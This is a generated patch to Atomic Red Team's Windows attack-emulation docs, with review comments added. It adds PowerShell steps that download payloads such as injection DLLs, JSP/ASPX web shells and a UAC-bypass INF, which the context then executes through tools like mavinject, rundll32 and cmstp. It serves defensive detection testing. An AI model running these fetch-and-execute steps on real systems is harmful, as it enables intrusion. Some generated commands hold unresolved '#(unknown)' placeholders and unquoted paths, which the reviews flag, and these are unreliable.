From cdb4000e205cf793a2e151fdaa7085e631e0b4f9 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 10 Mar 2020 23:03:32 +0000 Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master --- atomics/T1010/T1010.md | 4 +- atomics/T1016/T1016.md | 1 + atomics/T1036/T1036.md | 14 +- atomics/T1050/T1050.md | 24 ++ atomics/T1055/T1055.md | 12 + atomics/T1085/T1085.md | 48 ++++ atomics/T1100/T1100.md | 14 ++ atomics/T1117/T1117.md | 24 ++ atomics/T1118/T1118.md | 24 ++ atomics/T1121/T1121.md | 24 ++ atomics/T1127/T1127.md | 12 + atomics/T1138/T1138.md | 12 + atomics/T1174/T1174.md | 11 + atomics/T1179/T1179.md | 12 + atomics/T1191/T1191.md | 24 ++ atomics/T1196/T1196.md | 12 + atomics/T1218/T1218.md | 71 ++++++ atomics/T1220/T1220.md | 34 +++ atomics/T1223/T1223.md | 12 + atomics/T1500/T1500.md | 14 +- atomics/T1502/T1502.md | 14 +- atomics/index.yaml | 484 ++++++++++++++++++++++++++++++++++++++++- 22 files changed, 886 insertions(+), 15 deletions(-) diff --git a/atomics/T1010/T1010.md b/atomics/T1010/T1010.md index 797904b9..52d3187c 100644 --- a/atomics/T1010/T1010.md +++ b/atomics/T1010/T1010.md @@ -20,7 +20,6 @@ Compiles and executes C# code to list main window titles associated with each pr #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| input_url | URL to source code in Atomic-Red-Team git repository | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1010/src/T1010.cs| | input_source_code | Path to source of C# code | path | PathToAtomicsFolder\T1010\src\T1010.cs| | output_file_name | Name of output binary | string | $env:TEMP\T1010.exe| 
@@ -45,7 +44,8 @@ if (Test-Path #{input_source_code}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ``` -Invoke-WebRequest "#{input_URL}" -OutFile "#{input_source_code}" +New-Item -Type Directory (split-path #{input_source_code}) -ErrorAction ignore | Out-Null +Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1010/src/T1010.cs -OutFile "#{input_source_code}" ``` diff --git a/atomics/T1016/T1016.md b/atomics/T1016/T1016.md index 8ae7d183..34293e98 100644 --- a/atomics/T1016/T1016.md +++ b/atomics/T1016/T1016.md @@ -167,6 +167,7 @@ if (Test-Path "#{port_file}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ``` +New-Item -Type Directory (split-path #{port_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "#{portfile_url}" -OutFile "#{port_file}" ``` diff --git a/atomics/T1036/T1036.md b/atomics/T1036/T1036.md index b86c68db..dd3b76b8 100644 --- a/atomics/T1036/T1036.md +++ b/atomics/T1036/T1036.md @@ -169,7 +169,7 @@ Copies an exe, renames it as a windows exe, and launches it to masquerade as a r #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| inputfile | path of file to copy | path | $PathToAtomicsFolder\T1036\bin\t1036.exe| +| inputfile | path of file to copy | path | PathToAtomicsFolder\T1036\bin\t1036.exe| | outputfile | path of file to execute | path | ($env:TEMP + "\svchost.exe")| @@ -186,6 +186,18 @@ Remove-Item #{outputfile} -Force -ErrorAction Ignore ``` +#### Dependencies: Run with `powershell`! +##### Description: Exe file to copy must exist on disk at specified location (#{inputfile}) +##### Check Prereq Commands: +``` +if (Test-Path #{inputfile}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{inputfile}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036/bin/t1036.exe" -OutFile "#{inputfile}" +``` + 
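Review bot: The new `New-Item -Type Directory (split-path #{input_source_code})` line passes the substituted path to `split-path` unquoted while the `-OutFile "#{input_source_code}"` argument on the next line is quoted; if the resolved path contains a space, `split-path` receives several arguments and the directory is not created, after which the download fails. The pre-existing `Test-Path #{input_source_code}` check in the hunk context has the same exposure. The line should read `New-Item -Type Directory (split-path "#{input_source_code}") -ErrorAction ignore | Out-Null`, and the check `if (Test-Path "#{input_source_code}") {exit 0} else {exit 1}`. Every dependency block added in this commit repeats the unquoted form (T1016 and T1036 on this line, T1050 through T1502 on the following lines, and the matching `index.yaml` entries), and since these files are generated the fix presumably belongs in each technique's YAML rather than here.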
diff --git a/atomics/T1050/T1050.md b/atomics/T1050/T1050.md index f05cdab9..8f10bf5c 100644 --- a/atomics/T1050/T1050.md +++ b/atomics/T1050/T1050.md @@ -39,6 +39,18 @@ sc.exe delete #{service_name} ``` +#### Dependencies: Run with `powershell`! +##### Description: Service binary must exist on disk at specified location (#{binary_path}) +##### Check Prereq Commands: +``` +if (Test-Path #{binary_path}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1050/bin/AtomicService.exe" -OutFile "#{binary_path}" +``` + @@ -72,6 +84,18 @@ catch {} ``` +#### Dependencies: Run with `powershell`! +##### Description: Service binary must exist on disk at specified location (#{binary_path}) +##### Check Prereq Commands: +``` +if (Test-Path #{binary_path}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1050/bin/AtomicService.exe" -OutFile "#{binary_path}" +``` + diff --git a/atomics/T1055/T1055.md b/atomics/T1055/T1055.md index 93223747..26f22c3a 100644 --- a/atomics/T1055/T1055.md +++ b/atomics/T1055/T1055.md @@ -61,6 +61,18 @@ mavinject $mypid /INJECTRUNNING #{dll_payload} +#### Dependencies: Run with `powershell`! +##### Description: Utility to inject must exist on disk at specified location (#{dll_payload}) +##### Check Prereq Commands: +``` +if (Test-Path #{dll_payload}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/src/x64/T1055.dll" -OutFile "#{dll_payload}" +``` + 
diff --git a/atomics/T1085/T1085.md b/atomics/T1085/T1085.md index 42496387..4a6edd99 100644 --- a/atomics/T1085/T1085.md +++ b/atomics/T1085/T1085.md @@ -96,6 +96,18 @@ rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_Singl +#### Dependencies: Run with `powershell`! +##### Description: Inf file must exist on disk at specified location (#{inf_to_execute}) +##### Check Prereq Commands: +``` +if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085.inf" -OutFile "#{inf_to_execute}" +``` + @@ -123,6 +135,18 @@ rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_Sin +#### Dependencies: Run with `powershell`! +##### Description: Inf file must exist on disk at specified location (#{inf_to_execute}) +##### Check Prereq Commands: +``` +if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085.inf" -OutFile "#{inf_to_execute}" +``` + @@ -150,6 +174,18 @@ rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 .\#{inf +#### Dependencies: Run with `powershell`! +##### Description: Inf file must exist on disk at specified location (#{inf_to_execute}) +##### Check Prereq Commands: +``` +if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085_DefaultInstall.inf" -OutFile "#{inf_to_execute}" +``` + 
@@ -177,6 +213,18 @@ rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 .\#{inf_to_execu +#### Dependencies: Run with `powershell`! +##### Description: Inf file must exist on disk at specified location (#{inf_to_execute}) +##### Check Prereq Commands: +``` +if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085_DefaultInstall.inf" -OutFile "#{inf_to_execute}" +``` + diff --git a/atomics/T1100/T1100.md b/atomics/T1100/T1100.md index b6767f44..930537fc 100644 --- a/atomics/T1100/T1100.md +++ b/atomics/T1100/T1100.md @@ -37,6 +37,20 @@ del #{web_shell_path} ``` +#### Dependencies: Run with `powershell`! +##### Description: Web shell must exist on disk at specified location (#{web_shells}) +##### Check Prereq Commands: +``` +if (Test-Path #{web_shells}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1100/src/b.jsp" -OutFile "#{web_shells}/b.jsp" +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1100/src/tests.jsp" -OutFile "#{web_shells}/test.jsp" +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1100/src/cmd.aspx" -OutFile "#{web_shells}/cmd.aspx" +``` + diff --git a/atomics/T1117/T1117.md b/atomics/T1117/T1117.md index 2f4fc8ba..7d9152c9 100644 --- a/atomics/T1117/T1117.md +++ b/atomics/T1117/T1117.md 
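Review bot: In the T1100 hunk, `New-Item -Type Directory (split-path #{web_shells})` creates the parent of the web-shell directory rather than the directory itself: the input's default `PathToAtomicsFolder\T1100\src\` ends in a separator (visible in the `index.yaml` hunk further down), and `Split-Path` on such a path returns `...\T1100`, so on a fresh checkout `src` is never created and the three `-OutFile "#{web_shells}/..."` writes into it can fail. The line should be `New-Item -Type Directory "#{web_shells}" -ErrorAction ignore | Out-Null`. The second download also fetches `src/tests.jsp` but stores it as `test.jsp`; one of the two names looks wrong, though which one cannot be told from the hunk. Finally, `Test-Path #{web_shells}` reports the prerequisite satisfied as soon as the directory exists, even when empty, so checking one of the downloaded files (for example `if (Test-Path "#{web_shells}/cmd.aspx") {exit 0} else {exit 1}`) would make the check meaningful; the same applies to the T1100 entry in `index.yaml`.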
@@ -38,6 +38,18 @@ regsvr32.exe /s /u /i:#(unknown) scrobj.dll +#### Dependencies: Run with `powershell`! +##### Description: Regsvr32.exe must exist on disk at specified location (#(unknown)) +##### Check Prereq Commands: +``` +if (Test-Path #(unknown)) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #(unknown)) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1117/RegSvr32.sct" -OutFile "#(unknown)" +``` + @@ -88,6 +100,18 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr +#### Dependencies: Run with `powershell`! +##### Description: AllTheThingsx86.dll must exist on disk at specified location (#{dll_name}) +##### Check Prereq Commands: +``` +if (Test-Path #{dll_name}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{dll_name}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1117/bin/AllTheThingsx86.dll" -OutFile "#{dll_name}" +``` + diff --git a/atomics/T1118/T1118.md b/atomics/T1118/T1118.md index 3917505a..2ed8e2ae 100644 --- a/atomics/T1118/T1118.md +++ b/atomics/T1118/T1118.md @@ -34,6 +34,18 @@ C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToCo +#### Dependencies: Run with `powershell`! +##### Description: Source code must exist on disk at specified location (#{source}) +##### Check Prereq Commands: +``` +if (Test-Path #{source}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{source}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1118/src/T1118.cs" -OutFile "#{source}" +``` + 
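Review bot: The new dependency lines in the first T1117 hunk contain `#(unknown)` in place of an input name (`Test-Path #(unknown)`, `split-path #(unknown)`, `-OutFile "#(unknown)"`), which looks like an unresolved placeholder from the generator, so the generated prereq commands can never resolve to a path; the hunk's context line `regsvr32.exe /s /u /i:#(unknown) scrobj.dll` shows the executor command was already affected before this commit. The likely cause is an input argument referenced in the technique's YAML that its `input_arguments` section does not declare, but that cannot be confirmed from this page. The same `#(unknown)` appears in the new T1127 dependency block on a later line. Separately, the description `Regsvr32.exe must exist on disk at specified location` does not match what the block fetches (`RegSvr32.sct`); it should name the .sct file, e.g. `##### Description: RegSvr32.sct must exist on disk at specified location (...)`.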
@@ -61,6 +73,18 @@ C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /? #(unknown) +#### Dependencies: Run with `powershell`! +##### Description: Source code must exist on disk at specified location (#{source}) +##### Check Prereq Commands: +``` +if (Test-Path #{source}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{source}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1118/src/T1118.cs" -OutFile "#{source}" +``` + diff --git a/atomics/T1121/T1121.md b/atomics/T1121/T1121.md index ab585def..bf26e69f 100644 --- a/atomics/T1121/T1121.md +++ b/atomics/T1121/T1121.md @@ -38,6 +38,18 @@ del #{file_name} ``` +#### Dependencies: Run with `powershell`! +##### Description: The CSharp source file must exist on disk at specified location (#{source_file}) +##### Check Prereq Commands: +``` +if (Test-Path #{source_file}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1121/src/T1121.cs" -OutFile "#{source_file}" +``` + @@ -73,6 +85,18 @@ del key.snk >$null 2>&1 ``` +#### Dependencies: Run with `powershell`! +##### Description: The CSharp source file must exist on disk at specified location (#{source_file}) +##### Check Prereq Commands: +``` +if (Test-Path #{source_file}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1121/src/T1121.cs" -OutFile "#{source_file}" +``` + diff --git a/atomics/T1127/T1127.md b/atomics/T1127/T1127.md index ca8e8057..bf9b1373 100644 --- a/atomics/T1127/T1127.md +++ b/atomics/T1127/T1127.md 
@@ -60,6 +60,18 @@ C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #(unknown) +#### Dependencies: Run with `powershell`! +##### Description: Project file must exist on disk at specified location (#(unknown)) +##### Check Prereq Commands: +``` +if (Test-Path #(unknown)) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #(unknown)) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127/src/T1127.csproj" -OutFile "#(unknown)" +``` + diff --git a/atomics/T1138/T1138.md b/atomics/T1138/T1138.md index 20a7c968..e19aaf40 100644 --- a/atomics/T1138/T1138.md +++ b/atomics/T1138/T1138.md @@ -49,6 +49,18 @@ sdbinst.exe -u #{file_path} +#### Dependencies: Run with `powershell`! +##### Description: Shim database file must exist on disk at specified location (#{file_path}) +##### Check Prereq Commands: +``` +if (Test-Path #{file_path}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1138/src/AtomicShimx86.sdb" -OutFile "#{file_path}" +``` + diff --git a/atomics/T1174/T1174.md b/atomics/T1174/T1174.md index fdedf382..5537ce3a 100644 --- a/atomics/T1174/T1174.md +++ b/atomics/T1174/T1174.md @@ -37,6 +37,17 @@ Restart-Computer -Confirm +#### Dependencies: Run with `powershell`! +##### Description: AtomicPasswordFilter.dll must exist on disk at specified location (#{input_dll}) +##### Check Prereq Commands: +``` +if (Test-Path #{input_dll}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +Write-Host "You must provide your own password filter dll" +``` + diff --git a/atomics/T1179/T1179.md b/atomics/T1179/T1179.md index 22945162..0dd4ef7d 100644 --- a/atomics/T1179/T1179.md +++ b/atomics/T1179/T1179.md 
@@ -42,6 +42,18 @@ curl #{server_name} +#### Dependencies: Run with `powershell`! +##### Description: T1179x64.dll must exist on disk at specified location (#{file_name}) +##### Check Prereq Commands: +``` +if (Test-Path #{file_name}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1179/bin/T1179x64.dll" -OutFile "#{file_name}" +``` + diff --git a/atomics/T1191/T1191.md b/atomics/T1191/T1191.md index ea4d0cda..8d2a53b2 100644 --- a/atomics/T1191/T1191.md +++ b/atomics/T1191/T1191.md @@ -34,6 +34,18 @@ cmstp.exe /s #{inf_file_path} +#### Dependencies: Run with `powershell`! +##### Description: INF file must exist on disk at specified location (#{inf_file_path}) +##### Check Prereq Commands: +``` +if (Test-Path #{inf_file_path}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{inf_file_path}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1191/src/T1191.inf" -OutFile "#{inf_file_path}" +``` + @@ -59,6 +71,18 @@ cmstp.exe /s #{inf_file_uac} /au +#### Dependencies: Run with `powershell`! +##### Description: INF file must exist on disk at specified location (#{inf_file_uac}) +##### Check Prereq Commands: +``` +if (Test-Path #{inf_file_uac}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{inf_file_uac}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1191/src/T1191_uacbypass.inf" -OutFile "#{inf_file_uac}" +``` + diff --git a/atomics/T1196/T1196.md b/atomics/T1196/T1196.md index c65119b5..7a46db33 100644 --- a/atomics/T1196/T1196.md +++ b/atomics/T1196/T1196.md 
@@ -32,6 +32,18 @@ control.exe #{cpl_file_path} +#### Dependencies: Run with `powershell`! +##### Description: Cpl file must exist on disk at specified location (#{cpl_file_path}) +##### Check Prereq Commands: +``` +if (Test-Path #{cpl_file_path}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{cpl_file_path}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1196/bin/calc.cpl" -OutFile "#{cpl_file_path}" +``` + diff --git a/atomics/T1218/T1218.md b/atomics/T1218/T1218.md index 371adf2a..79d64c6b 100644 --- a/atomics/T1218/T1218.md +++ b/atomics/T1218/T1218.md @@ -66,6 +66,18 @@ mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload} +#### Dependencies: Run with `powershell`! +##### Description: T1218.dll must exist on disk at specified location (#{dll_payload}) +##### Check Prereq Commands: +``` +if (Test-Path #{dll_payload}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll" -OutFile "#{dll_payload}" +``` + @@ -116,6 +128,18 @@ C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload} +#### Dependencies: Run with `powershell`! +##### Description: T1218-2.dll must exist on disk at specified location (#{dll_payload}) +##### Check Prereq Commands: +``` +if (Test-Path #{dll_payload}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}" +``` + 
@@ -141,6 +165,17 @@ msiexec.exe /q /i "#{msi_payload}" +#### Dependencies: Run with `powershell`! +##### Description: T1218.msi must exist on disk at specified location (#{msi_payload}) +##### Check Prereq Commands: +``` +if (Test-Path #{msi_payload}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +Write-Host "You must provide your own MSI" +``` + @@ -191,6 +226,18 @@ msiexec.exe /y "#{dll_payload}" +#### Dependencies: Run with `powershell`! +##### Description: T1218-2.dll must exist on disk at specified location (#{dll_payload}) +##### Check Prereq Commands: +``` +if (Test-Path #{dll_payload}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}" +``` + @@ -216,6 +263,18 @@ odbcconf.exe /S /A {REGSVR "#{dll_payload}"} +#### Dependencies: Run with `powershell`! +##### Description: T1218-2.dll must exist on disk at specified location (#{dll_payload}) +##### Check Prereq Commands: +``` +if (Test-Path #{dll_payload}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}" +``` + 
@@ -243,6 +302,18 @@ InfDefaultInstall.exe #{inf_to_execute} +#### Dependencies: Run with `powershell`! +##### Description: INF file must exist on disk at specified location (#{inf_to_execute}) +##### Check Prereq Commands: +``` +if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Infdefaultinstall.inf" -OutFile "#{inf_to_execute}" +``` + diff --git a/atomics/T1220/T1220.md b/atomics/T1220/T1220.md index b17a7a81..c713f62d 100644 --- a/atomics/T1220/T1220.md +++ b/atomics/T1220/T1220.md @@ -50,6 +50,28 @@ C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile} +#### Dependencies: Run with `powershell`! +##### Description: XML file must exist on disk at specified location (#{xmlfile}) +##### Check Prereq Commands: +``` +if (Test-Path #{xmlfile}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{xmlfile}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslxmlfile.xml" -OutFile "#{xmlfile}" +``` +##### Description: XSL file must exist on disk at specified location (#{xslfile}) +##### Check Prereq Commands: +``` +if (Test-Path #{xslfile}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{xslfile}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslscript.xsl" -OutFile "#{xslfile}" +``` + 
@@ -102,6 +124,18 @@ wmic.exe #{wmic_command} /FORMAT:#{local_xsl_file} +#### Dependencies: Run with `powershell`! +##### Description: XSL file must exist on disk at specified location (#{local_xsl_file}) +##### Check Prereq Commands: +``` +if (Test-Path #{local_xsl_file}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{local_xsl_file}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/wmicscript.xsl" -OutFile "#{local_xsl_file}" +``` + diff --git a/atomics/T1223/T1223.md b/atomics/T1223/T1223.md index 0b21037d..abdc0ac7 100644 --- a/atomics/T1223/T1223.md +++ b/atomics/T1223/T1223.md @@ -32,6 +32,18 @@ hh.exe #{local_chm_file} +#### Dependencies: Run with `powershell`! +##### Description: The payload must exist on disk at specified location (#{local_chm_file}) +##### Check Prereq Commands: +``` +if (Test-Path #{local_chm_file}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{local_chm_file}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1223/src/T1223.chm" -OutFile "#{local_chm_file}" +``` + diff --git a/atomics/T1500/T1500.md b/atomics/T1500/T1500.md index 857dc601..f229030c 100644 --- a/atomics/T1500/T1500.md +++ b/atomics/T1500/T1500.md @@ -21,7 +21,7 @@ Compile C# code using csc.exe binary used by .NET #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| input_file | C# code that launches calc.exe from a hidden cmd.exe Window | file | $PathToAtomicsFolder\T1500\src\calc.cs| +| input_file | C# code that launches calc.exe from a hidden cmd.exe Window | file | PathToAtomicsFolder\T1500\src\calc.cs| | output_file | Output compiled binary | file | C:\Windows\Temp\T1500.exe| 
@@ -36,6 +36,18 @@ del #{output_file} ``` +#### Dependencies: Run with `powershell`! +##### Description: C# file must exist on disk at specified location (#{input_file}) +##### Check Prereq Commands: +``` +if (Test-Path #{input_file}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{input_file}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1500/src/calc.cs" -OutFile "#{input_file}" +``` + diff --git a/atomics/T1502/T1502.md b/atomics/T1502/T1502.md index 571cc42f..dc7c697b 100644 --- a/atomics/T1502/T1502.md +++ b/atomics/T1502/T1502.md @@ -24,7 +24,7 @@ Credit to In Ming Loh (https://github.com/countercept/ppid-spoofing/blob/master/ | Name | Description | Type | Default Value | |------|-------------|------|---------------| | parent_process_name | Name of the parent process | string | explorer| -| dll_path | Path of the dll to inject | string | $PathToAtomicsFolder\T1502\bin\calc.dll| +| dll_path | Path of the dll to inject | string | PathToAtomicsFolder\T1502\bin\calc.dll| | dll_process_name | Name of the created process from the injected dll | string | calculator| | spawnto_process_path | Path of the process to spawn | string | C:\Program Files\Internet Explorer\iexplore.exe| | spawnto_process_name | Name of the process to spawn | string | iexplore| @@ -44,6 +44,18 @@ Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore ``` +#### Dependencies: Run with `powershell`! +##### Description: DLL to inject must exist on disk at specified location (#{dll_path}) +##### Check Prereq Commands: +``` +if (Test-Path #{dll_path}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1502/bin/calc.dll" -OutFile "#{dll_path}" +``` + 
diff --git a/atomics/index.yaml b/atomics/index.yaml index 0b3278c1..92eebc52 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml @@ -626,6 +626,13 @@ persistence: description: Path to the shim databaase file type: String default: PathToAtomicsFolder\T1138\src\AtomicShimx86.sdb + dependency_executor_name: powershell + dependencies: + - description: Shim database file must exist on disk at specified location (#{file_path}) + prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1138/src/AtomicShimx86.sdb" -OutFile "#{file_path}" executor: name: command_prompt elevation_required: true @@ -1874,6 +1881,13 @@ persistence: description: TLS Server To Test Get Request type: Url default: https://www.example.com + dependency_executor_name: powershell + dependencies: + - description: T1179x64.dll must exist on disk at specified location (#{file_name}) + prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1179/bin/T1179x64.dll" -OutFile "#{file_name}" executor: name: powershell elevation_required: true 
@@ -3087,6 +3101,13 @@ persistence: description: Name of the Service type: String default: AtomicTestService + dependency_executor_name: powershell + dependencies: + - description: Service binary must exist on disk at specified location (#{binary_path}) + prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1050/bin/AtomicService.exe" -OutFile "#{binary_path}" executor: name: command_prompt elevation_required: true @@ -3111,6 +3132,13 @@ persistence: description: Name of the Service type: String default: AtomicTestService + dependency_executor_name: powershell + dependencies: + - description: Service binary must exist on disk at specified location (#{binary_path}) + prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{binary_path}) 